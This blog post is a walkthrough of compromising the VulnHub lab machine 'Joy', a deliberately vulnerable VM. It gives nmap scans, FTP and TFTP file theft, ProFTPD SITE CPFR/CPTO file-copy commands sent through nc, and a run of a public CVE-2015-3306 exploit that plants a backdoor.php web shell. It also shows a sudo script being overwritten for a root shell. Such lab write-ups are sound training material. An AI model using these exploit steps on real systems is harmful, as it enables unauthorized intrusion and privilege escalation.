Digitalworld Joy VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.

Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly.

I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on dropbear ssh exploit than I should have.

Flow

  1. Enumerate ports and versions
  2. Download all FTP content
  3. Waste time trying to exploit dropbear ssh
  4. Proftpd allows CPFR and CPTO, but exploit needs the web directory (it isn’t default)
  5. Download patrick’s files via TFTP, discovered by SNMP (also possible to download via with the CPFR and CPTO trick, will show both)
  6. Discover web directory from patrick’s files and use proftpd exploit to get a web RCE
  7. Get a reverse shell via RCE
  8. Find patrick’s password and su to patrick
  9. Replace sudo script with CPFR/CPTO trick and get a root shell
  10. Get flag

Initial Enumeration

Nmap – TCP Ports

nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00046s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:32:A4:6A (VMware)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC:  (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2020-06-16T19:54:56+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-16T11:54:56 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds

Nmap – UDP Ports

SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.

nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000  10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (secondary server)
| ntp-info: 
|_ 
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 29
|_ snmpEngineTime: 44m11s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 5.31 Kb sent, 5.31 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.88.42.136 Netmask: 255.255.255.0
| MAC address: 00:0c:29:32:a4:6a (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 89.38 Mb sent, 241.11 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 0.0.0.0:42070 *:*
| UDP 0.0.0.0:51704 *:*
| UDP 10.88.42.136:123 *:*
| UDP 10.88.42.136:137 *:*
| UDP 10.88.42.136:138 *:*
| UDP 10.88.42.255:137 *:*
| UDP 10.88.42.255:138 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes: 
...
| 754: 
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
...

FTP – Anonymous FTP

Since anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.

mkdir ftp
cd ftp
lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136

FTP – FILES

.
./download
./upload
./upload/project_yolo
./upload/project_malindo
./upload/project_woranto
./upload/project_flamingo
./upload/project_bravado
./upload/project_luyano
./upload/project_komodo
./upload/project_desperado
./upload/reminder
./upload/project_okacho
./upload/directory
./upload/project_toto
./upload/project_sicko
./upload/project_zoo
./upload/project_vivino
./upload/project_armadillo
./upload/project_polento
./upload/project_indigo
./upload/project_uno
./upload/project_emilio
./upload/project_ronaldinho

FTP – upload/directory

More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).

Patrick's Directory

total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt
d--------- 2 root root 4096 Jan 9 2019 script
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt

You should know where the directory can be accessed.

Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

What I Did Before UDP Scan Finished

Dropbear SSH Exploit Attempt

I wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).

ProFTPD Exploit Attempt

I spent time on a searchsploit provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).

What We Now Know

  • patrick is a system user
  • patrick’s home directory is /home/patrick
  • we have a list of patrick’s files that are likely in /home/patrick
  • TFTP is serving /home/patrick

TFTP – Getting Patrick’s Files

Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files.

awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!

FTP – Getting Patrick’s Files

We can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.

for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done
cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -

Exploiting ProFTPD

We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to try to exploit for proftpd.

I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!

[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py 
usage: exploit.py [-h] --host HOST --port PORT --path PATH
exploit.py: error: the following arguments are required: --host, --port, --path
[18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.88.42.136:21
[+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php
[+] Running whoami: www-data
[+] Done
[18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE

“which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again.

I tried the bash one, and it didn’t work. So I went to CyberChef to url encode the bash reverse shell.

I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to url encode the PHP reverse shell.

Digitalworld local joy initialshell

Pivot to the Patrick User

Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password.

[email protected]:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy 
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
[email protected]:/var/www/tryingharderisjoy/ossec$
patrick:apollo098765

I tried to ssh in, but that didn’t work.

[email protected]:~$ ssh [email protected]
Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

I could, fortunately, su to patrick.

Digitalworld local joy supatrick

Pivot to Root

There’s a sudo command that uses a custom command. Unfortunately, I couldn’t edit or read the file directly.

Digitalworld local joy patricksudo

But I could replace its contents using the FTP CPFR/CPTO trick from earlier.

cd /dev/shm
echo -e '#!/bin/sh\nsh\n'>test
chmod +x test
echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21

Then I ran the sudo command and got a root shell.

Digitalworld local joy patricksudotoroot

Flag

Digitalworld local joy rootflag

Leave a Reply

Your email address will not be published. Required fields are marked *